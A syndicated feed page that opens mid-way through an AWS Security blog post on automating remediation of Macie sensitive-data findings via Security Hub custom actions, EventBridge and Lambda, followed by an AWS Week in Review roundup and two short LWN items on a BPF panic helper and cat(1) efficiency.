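            bucket, key = object_arn.split(":::")[1].split("/", 1)

            # 1. Tag the object with the Security Hub finding ID
            s3.put_object_tagging(
                Bucket=bucket,
                Key=key,
                Tagging={"TagSet": [{"Key": "SH_Finding_ID", "Value": finding_id}]},
            )

            # 2. Re-encrypt the object in place with a customer-managed KMS key
            #    (objects larger than 5 GB would need a multipart copy instead)
            s3.copy_object(
                Bucket=bucket,
                Key=key,
                CopySource={"Bucket": bucket, "Key": key},
                ServerSideEncryption="aws:kms",
                SSEKMSKeyId=os.environ["MACIE_KMS_KEY_ARN"],
                MetadataDirective="COPY",
                TaggingDirective="COPY",
            )

            # 3. Mark the finding as resolved in Security Hub
            securityhub.batch_update_findings(
                FindingIdentifiers=[{"Id": finding_id, "ProductArn": product_arn}],
                Workflow={"Status": "RESOLVED"},
            )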

The solution is configured to take action within the AWS account where the finding and corresponding resource are generated. In order to enable cross-account remediation, you will need to deploy an additional IAM role for the automation to assume and provision a KMS key to use for encryption.

Note: The custom actions in this solution are meant to be examples of actions to take against Macie policy and sensitive data findings. These actions will differ depending on your use case and environment. You will also need to review and update the associated Lambda function execution role IAM policies accordingly.

Solution architecture

Figure 1: Resources deployed in the Security AWS account taking action on resources identified in the Workload AWS account

Figure 1 shows the architecture for the solution. The workflow is as follows:

  1. A Macie job runs and creates findings, which are sent to Security Hub in the same AWS account as the Macie finding.
  2. The delegated administrator Security Hub account combines findings across all member Security Hub accounts, including Macie findings.
  3. The security team reviews the Macie findings in the Security Hub delegated administrator account and decides to remediate a finding by selecting it and then selecting the appropriate Security Hub custom action.
  4. The Security Hub custom action sends the finding to the EventBridge rule, which is linked to the Lambda function.
  5. The EventBridge rule invokes the Lambda function to take action against the resources from the Macie finding.
  6. The Lambda function will:
    1. Take action for the S3 resource
    2. Mark the Macie finding as resolved in the delegated administrator Security Hub account

The solution is currently intended to work in a single Region. In order to enable this solution across Regions, you will need to change the remediation Lambda function code for any Regional resources used for remediation actions (for example, AWS Key Management Service keys).

Deploy the solution

You can deploy the solution through either the AWS Management Console or the AWS Cloud Development Kit (AWS CDK).

To deploy the solution by using the AWS Management Console

  • In your security tooling account, launch the AWS CloudFormation template by choosing the following Launch Stack button. It will take approximately 10 minutes for the CloudFormation stack to complete.
    Select this image to open a link that starts building the CloudFormation stack

    Note: The stack will launch in the N. Virginia (us-east-1) Region. To deploy this solution into other AWS Regions, download the solution’s CloudFormation template, modify it, and deploy it to the selected Region.

  • (OPTIONAL) If you want to enable cross-account remediation, launch the following AWS CloudFormation template in the AWS account where you want to be able to take remediation actions. You can also use AWS CloudFormation StackSets if deploying to multiple AWS accounts.
    Select this image to open a link that starts building the CloudFormation stack

To deploy the solution by using AWS CDK

You can find the latest code in our GitHub repository, where you can also contribute to the sample code. The following commands show how to deploy the solution by using the AWS CDK. First, the CDK initializes your environment and uploads the AWS Lambda assets to Amazon S3. Then, you can deploy the solution to your account. Make sure to replace <Security_Tooling_AWS_ACCOUNT> and <Member_AWS_ACCOUNT> with the appropriate account numbers, and replace <REGION> with the AWS Region that you want the solution deployed to.

  1. Run the following commands in your terminal while authenticated in the security tooling AWS account:

    cdk bootstrap aws://<Security_Tooling_AWS_ACCOUNT>/<REGION>

    cdk deploy MacieRemediationStack

  2. (OPTIONAL) If you want to enable cross-account remediation, run the following commands in your terminal while authenticated to the member AWS account:

    cdk bootstrap aws://<Member_AWS_ACCOUNT>/<REGION>

    cdk deploy MacieRemediationIAMStack --parameters solutionaccount=<Security_Tooling_AWS_ACCOUNT>

Solution walkthrough and validation

Now that you’ve successfully deployed the solution, you can see things in action. You have two options for testing the workflow on your own:

  1. Use a sample event, generated by a Macie finding in Security Hub, and invoke the Lambda function that is tied to the Security Hub custom action (a minimal invocation sketch follows this list).

    Note: If you use sample events, replace the resource values with real resources in your account. Otherwise, the Lambda function will not be able to take action successfully, because the resources in your sample event may not exist.

  2. Generate demo Macie findings in Security Hub by using this sample data for Amazon Macie.
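If you take the sample-event route, a direct invocation could look like the following sketch. The sample event file name is a placeholder; the function name assumes the bucket remediation function whose log group is referenced later in this post.

    import json

    import boto3

    lambda_client = boto3.client("lambda")

    # A saved Security Hub custom action event with real resource ARNs substituted in
    with open("sample_macie_policy_finding_event.json") as f:
        sample_event = json.load(f)

    response = lambda_client.invoke(
        FunctionName="Remediate_Macie_S3_Bucket",
        Payload=json.dumps(sample_event).encode("utf-8"),
    )
    print(response["StatusCode"], response["Payload"].read().decode("utf-8"))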

I have existing findings for Macie generated in my AWS account, and in the procedures in this section, I’ll walk through taking action against these.

Note: If you set up Macie and Security Hub in a delegated administrator and member model that ingests findings from other AWS accounts, the IAM remediation roles for the S3 bucket and S3 objects must be deployed in the member accounts.

Review deployed resources in the AWS console

Before taking action on your sample findings, review the deployed resources that you’ll use.

To review deployed resources

  1. In the AWS account console where the automation was deployed, go to Security Hub, choose Settings, and then choose Custom actions. You should see two custom actions:
    • Macie Policy Finding
      • arn:aws:securityhub:<region>:<account-id>:action/custom/MacieS3BucketPolicy
    • Macie Data Finding
      • arn:aws:securityhub:<region>:<account-id>:action/custom/MacieSensitiveData
        Figure 2: Custom actions in Security Hub

  2. Navigate to the EventBridge console and then choose Rules. You should see four rules:
    • Disabled – These are disabled by default during deployment:
      • Autoremediate_Macie_Policy_Finding
      • Autoremediate_Macie_Sensitive_Data_Finding
        Figure 3: Disabled EventBridge rules for autoremediation of Macie findings in Security Hub

    • Enabled – These are enabled by default during deployment:
      • Custom_Action_Macie_Policy_Finding
      • Custom_Action_Macie_Sensitive_Data_Finding
        Figure 4: Enabled EventBridge rules tied to the Security Hub custom actions

    In the enabled EventBridge rules, you should see the corresponding Security Hub custom action Amazon Resource Names (ARNs) in the rule event pattern; a representative pattern is sketched after the following figure.

    Figure 5: Enabled EventBridge rule event pattern for the Security Hub custom action
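For reference, the event pattern for such a rule matches the Security Hub custom action ARN in the event’s resources list. The following sketch shows roughly how one of these rules could be defined with boto3; the Region, account ID, and rule name are placeholders.

    import json

    import boto3

    events = boto3.client("events")

    # Matches findings sent to EventBridge by the MacieSensitiveData custom action
    event_pattern = {
        "source": ["aws.securityhub"],
        "detail-type": ["Security Hub Findings - Custom Action"],
        "resources": ["arn:aws:securityhub:us-east-1:111122223333:action/custom/MacieSensitiveData"],
    }

    events.put_rule(
        Name="Custom_Action_Macie_Sensitive_Data_Finding",
        EventPattern=json.dumps(event_pattern),
        State="ENABLED",
    )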

Take action on an Amazon Macie object or policy finding

Each Security Hub custom action invokes a corresponding Lambda function that is configured as a target in the EventBridge rule. The Lambda function parses the information in the Macie finding from Security Hub to take action.

Each Security Hub custom action is specific to either an S3 object or an S3 bucket. If you run the custom action meant for an S3 object against a Macie policy finding, the custom action itself will still be initiated, but the Lambda function that it invokes will fail.

If the Macie finding is specific to an S3 object, the title will display “The S3 object …,” whereas if the Macie finding is for a policy finding, the title will display information for an S3 bucket.

To take action on findings

  1. In the AWS account console where the automation was deployed, navigate to AWS Security Hub, and then choose Findings.
  2. Filter the findings by setting Product Name to Macie.
    Figure 6: Filter for Macie findings in Security Hub

  3. Select the checkbox for either a Macie policy finding or a sensitive data finding, and then choose the corresponding custom action from the Actions menu. After you select the action, there is no confirmation step, and the action immediately invokes the Lambda function.
    Figure 7: Validate Custom Action has sent the finding to Amazon CloudWatch Events (EventBridge rule)

Review and validate the Security Hub custom action on target resources

In order to validate or troubleshoot the solution, you need to review whether the Lambda function was able to take action against the resources in the Security Hub finding for Macie. You can do this in the console by following the steps below, or script the same checks (see the sketch after the list).

To validate or troubleshoot the custom action

  1. For validation of sensitive data finding remediation, review S3 object configuration:
    1. Navigate to the Amazon S3 console.
    2. Choose the S3 object in the Macie finding.
    3. Choose the Properties tab and review the following fields:
      • Tags should be set to SH_Finding_ID.
      • AWS KMS key ARN should be set to the KMS key with the alias `macie_key`.
        1. Choose the KMS key ARN and validate that the key’s alias matches the key deployed by the solution.
  2. For validation of policy finding remediation, review the S3 bucket configuration:
    1. Navigate to the Amazon S3 console.
    2. Choose the S3 bucket in the Macie finding.
    3. Choose the Properties tab and review the following fields:
      • Tags should be set to SH_Finding_ID.
      • Default Encryption should be set to Enabled.
    4. Choose the Permissions tab and review the following fields:
      • Block public access should be set to On.
  3. For troubleshooting, you can review the CloudWatch logs for the Lambda function:
    1. Navigate to the CloudWatch console.
    2. Choose /aws/lambda/Remediate_Macie_S3_Bucket.
    3. Choose the most recent log stream and review the logs to see what actions were taken on the resources.
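If you prefer to script these checks instead of clicking through the console, the following sketch queries the same properties with boto3; the bucket name and object key are placeholders.

    import boto3

    s3 = boto3.client("s3")
    bucket = "amzn-s3-demo-bucket"          # placeholder
    key = "path/to/flagged-object.csv"      # placeholder

    # Sensitive data finding: the object should carry the finding tag and the new KMS key
    print(s3.get_object_tagging(Bucket=bucket, Key=key)["TagSet"])
    head = s3.head_object(Bucket=bucket, Key=key)
    print(head.get("ServerSideEncryption"), head.get("SSEKMSKeyId"))

    # Policy finding: the bucket should have default encryption and public access block enabled
    print(s3.get_bucket_encryption(Bucket=bucket)["ServerSideEncryptionConfiguration"])
    print(s3.get_public_access_block(Bucket=bucket)["PublicAccessBlockConfiguration"])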

Next steps and customization

The solution in this post has a custom action for an S3 object and an S3 bucket, and is meant to serve as a template. You could modify the Lambda functions associated with the custom actions to take different or additional actions that are specific to your environment and data classification.

Additionally, I walked through specific Security Hub custom actions for Macie policy (bucket) or sensitive data (objects) findings. If you have defined actions to take for both, you could consolidate the custom actions and invoke a Lambda function that parses information from the Security Hub Macie finding to determine if it is a policy or sensitive data finding.
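One way to branch inside such a consolidated handler is to inspect the resource type reported in the AWS Security Finding Format (ASFF). The following sketch illustrates the idea; it is not code from the solution.

    def route_finding(finding):
        """Pick a remediation path based on the resource types in an ASFF finding."""
        resource_types = {resource["Type"] for resource in finding["Resources"]}
        if "AwsS3Object" in resource_types:
            return "sensitive-data"  # remediate the S3 object
        if "AwsS3Bucket" in resource_types:
            return "policy"          # remediate the S3 bucket configuration
        raise ValueError(f"Unexpected resource types: {resource_types}")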

The two disabled EventBridge rules deployed as part of the solution are examples that can be leveraged for auto-remediation. After your security team has used the Security Hub custom actions to remediate findings for a while, you might see a trend where specific actions are always taken. At that point, you can enable the following EventBridge rules to take those actions automatically, without requiring your security team to select a custom action in the Security Hub console:

  • Autoremediate_Macie_Policy_Finding
  • Autoremediate_Macie_Sensitive_Data_Finding

Conclusion

In this post, you deployed a solution that allows your security team to take automated actions against Macie sensitive data and policy findings from Security Hub by using custom actions in the AWS console. We walked through what the solution does and how the solution can be customized to your use case.

If you have feedback about this post, submit comments in the Comments section below. If you have any questions about this post, start a thread on the AWS Security Hub forum or Amazon Macie forum.

Want more AWS Security news? Follow us on Twitter.

Jonathan Nguyen

Jonathan is a Shared Delivery Team Senior Security Consultant at AWS. His background is in AWS Security with a focus on threat detection and incident response. Today, he helps enterprise customers develop a comprehensive security strategy and deploy security solutions at scale, and he trains customers on AWS Security best practices.

AWS Week In Review – July 18, 2022

Post Syndicated from Channy Yun original https://aws.amazon.com/blogs/aws/aws-week-in-review-july-18-2022/

Last week, AWS Summit New York was held in person at the Javits Center with thousands of attendees and over 100 sponsors and partners. During the keynote, Martin Beeby, AWS Principal Developer Advocate, talked about how innovations in cloud infrastructure enable customers to adapt to challenges and seize new opportunities. It included Liz Fong-Jones’s story of Honeycomb’s great migration to AWS Graviton and Elliott Cordo’s story of improving pharmacy experiences at Capsule using AWS analytics and machine learning services.

Watch the full keynote video!

A Recap of AWS Summit NY Announcements
During the keynote, we announced the general availability of some new services:

Amazon Redshift Serverless – This serverless option lets you analyze data at any scale without having to manage data warehouse infrastructure. You can now create multiple serverless endpoints per AWS account and Region using namespaces and workgroups, and benefit from lower serverless compute costs compared to the preview. To learn more, check out Danilo’s blog post, this demo video, and the latest episode of The Official AWS Podcast. We also introduced row-level security (RLS), which implements fine-grained access to the rows in tables, and automated materialized views to lower query latency for repeatable workloads.

AWS Cloud WAN – This new network service makes it easy to build and operate wide area networks (WAN) that connect your data centers and branch offices, as well as multiple VPCs in multiple AWS Regions. To learn more, read Seb’s blog post.

Amazon DevOps Guru’s Log Anomaly Detection and Recommendations – This new feature identifies anomalies such as increased latency, error rates, and resource constraints within your app and then sends alerts with a description and actionable recommendations for remediation. To learn more, see the blog post by Donnie, one of our new News Blog writers.

Last Week’s Launches
Here are some other launches that caught my attention last week:

AWS AppConfig, a feature of AWS Systems Manager, makes it easy for customers to quickly and safely configure, validate, and deploy feature flags and application configuration. Now, we have announced AWS AppConfig Extensions, a new capability that allows customers to enhance and extend the capabilities of feature flags and dynamic runtime configuration data.

Available extensions at launch include notification extensions that push messages about configuration updates to Amazon EventBridge, Amazon SNS, or Amazon SQS, as well as a Jira extension that tracks feature flag changes in AppConfig as Atlassian Jira issues. To get started, read Announcing AWS AppConfig Extensions and AppConfig Extensions.

Amazon VPC Flow Logs for Transit Gateway is a new capability that allows customers to gain deeper visibility and insights into network traffic on AWS Transit Gateway. With this feature, Transit Gateway can export detailed information, such as source/destination IPs, ports, protocols, traffic counters, timestamps, and various metadata for all of the network flows traversing the Transit Gateway. To learn more, read Introducing VPC Flow Logs for AWS Transit Gateway and Logging network traffic using Transit Gateway Flow Logs.

AWS Lambda Powertools for TypeScript is an open-source developer library that can help you incorporate Well-Architected Serverless best practices focusing on three observability features: distributed tracing (Tracer), structured logging (Logger), and asynchronous business and application metrics (Metrics). Powertools is also available in the Python and Java programming languages. To learn more, see the blog post Simplifying serverless best practices with AWS Lambda Powertools for TypeScript. You can submit feedback, ideas, and issues directly on our GitHub project.
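As a rough illustration of those three features, here is a minimal sketch using the existing Python flavor of Powertools (the TypeScript API is analogous); the service and namespace names are placeholders.

    from aws_lambda_powertools import Logger, Metrics, Tracer
    from aws_lambda_powertools.metrics import MetricUnit

    logger = Logger(service="orders")
    tracer = Tracer(service="orders")
    metrics = Metrics(namespace="SampleApp", service="orders")


    @logger.inject_lambda_context
    @tracer.capture_lambda_handler
    @metrics.log_metrics
    def handler(event, context):
        # Structured log entry with the Lambda context injected automatically
        logger.info("processing order", extra={"order_id": event.get("order_id")})
        # Business metric emitted asynchronously via the CloudWatch Embedded Metric Format
        metrics.add_metric(name="OrdersProcessed", unit=MetricUnit.Count, value=1)
        return {"statusCode": 200}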

AWS re:Post is a vibrant Q&A community that helps you become even more successful on AWS. You can now add a profile picture or avatar to your account and add inline images such as diagrams or screenshots to support your questions or answers. Add your profile picture and start using inline images today!

For a full list of AWS announcements, be sure to keep an eye on the What’s New at AWS page.

Other AWS News
Here are some news, blog posts, and video series for you to know:

In July 2021, we notified users about the end of support for Internet Explorer 11, which is now approaching on July 31, 2022. The browser will no longer be supported in the AWS Management Console, web-based services such as Amazon QuickSight, Amazon Chime, Amazon Honeycode, and some other AWS websites. After that date, we can no longer guarantee that the features and webpages will function properly on IE 11. For more information, please visit AWS Supported Browsers.

In fall 2021, we began offering a free multi-factor authentication (MFA) security key to AWS account owners in the United States. Now eligible customers can order the free MFA security key through the ordering portal in the AWS Management Console. At this time, only U.S.-based AWS account root users who have spent more than $100 each month over the past 3 months are eligible to place an order. For more information, see our Free MFA Security Key page.

Amazon’s Machine Learning University expands with MLU Explains, a public website containing visual essays that incorporate fun animations and scrollytelling to explain machine learning concepts in an accessible manner. The following animation teaches the concepts of data splitting in machine learning using an example model that attempts to determine whether animals are cats or dogs. To learn more, read the Amazon Science blog post.

This is My Architecture is a video series that showcases innovative architectural solutions on the AWS Cloud by customers and partners. In June and July, over 15 episodes were updated, including GoDaddy, Riot Games, and Hudl. Each episode examines the most interesting and technically creative elements of each cloud architecture.

Upcoming AWS Events in August
Check your calendars and sign up for these AWS events:

AWS Summit – Registration is open for upcoming in-person AWS Summits that might be close to you in August: Sao Paulo (August 3–4), Anaheim (August 18), Taiwan (August 10–11), Chicago (August 28), and Canberra (August 31).

AWS Innovate – Data Edition – On August 23, learn how a modern data strategy can support your present and future use cases, including steps to build an end-to-end data solution to store and access, analyze and visualize, and even predict.

AWS Innovate – For Every Application Edition – On August 25, learn about a wide selection of AWS solutions across compute, storage, networking, hybrid, and edge infrastructure to help you scale application resources seamlessly and optimally.

Although these two Innovate events will be held in Asia Pacific and Japan time zones, you can view on-demand videos for two months following your registration.

If you’re interested in learning modern development practices live in New York City, I recommend joining AWS Solutions Day on August 10. I love the advanced topics that focus on building new web apps with Java, JavaScript, TypeScript, and GraphQL.

If you’re interested in learning AWS fundamentals and preparing for AWS Certifications, there are several virtual events in August, such as AWS Cloud Practitioner Essentials Day, AWS Technical Essentials Day, and Exam Readiness for AWS Certificates.

That’s all for this week. Check back next Monday for another Week in Review!

— Channy

This post is part of our Week in Review series. Check back each week for a quick roundup of interesting news and announcements from AWS!

[$] The BPF panic function

Post Syndicated from original https://lwn.net/Articles/901284/

One of the key selling points of the BPF subsystem is that loading a BPF program is safe: the BPF verifier ensures that the program cannot hurt the kernel before allowing the load to occur. That guarantee is perhaps losing some of its force as more capabilities are made available to BPF programs but, even so, it may be a bit surprising to see this proposal from Artem Savkov adding a BPF helper that is explicitly designed to crash the system. If this patch set is merged in something resembling its current form, it will be the harbinger of a new era where BPF programs are, in some situations at least, allowed to be overtly destructive.

Conill: How efficient can cat(1) be?

Post Syndicated from original https://lwn.net/Articles/901707/

Ariadne Conill explores ways to make the Unix cat utility more efficient on Linux.

The first possible option is the venerable sendfile syscall, which was originally added to improve the file serving performance of web servers. Originally, sendfile required the destination file descriptor to be a socket, but this restriction was removed in Linux 2.6.33. Unfortunately, sendfile is not perfect: because it only supports file descriptors which can be memory mapped, we must use a different strategy when copying from stdin.
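As a rough illustration of the approach described in the excerpt (and not code from Conill’s article), the following Python sketch copies a regular file to stdout with the sendfile syscall; it assumes Linux 2.6.33 or later, where the destination can be an arbitrary file descriptor.

    import os
    import sys


    def copy_with_sendfile(path, out_fd, chunk=1 << 20):
        """Copy a regular (mmap-able) file to out_fd using sendfile, avoiding userspace buffers."""
        in_fd = os.open(path, os.O_RDONLY)
        try:
            size = os.fstat(in_fd).st_size
            offset = 0
            while offset < size:
                sent = os.sendfile(out_fd, in_fd, offset, min(chunk, size - offset))
                if sent == 0:  # defensive: stop if the kernel reports no progress
                    break
                offset += sent
        finally:
            os.close(in_fd)


    if __name__ == "__main__":
        for name in sys.argv[1:]:
            copy_with_sendfile(name, sys.stdout.fileno())

As the excerpt notes, stdin generally cannot be handled this way, because sendfile needs a source descriptor that supports memory mapping.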
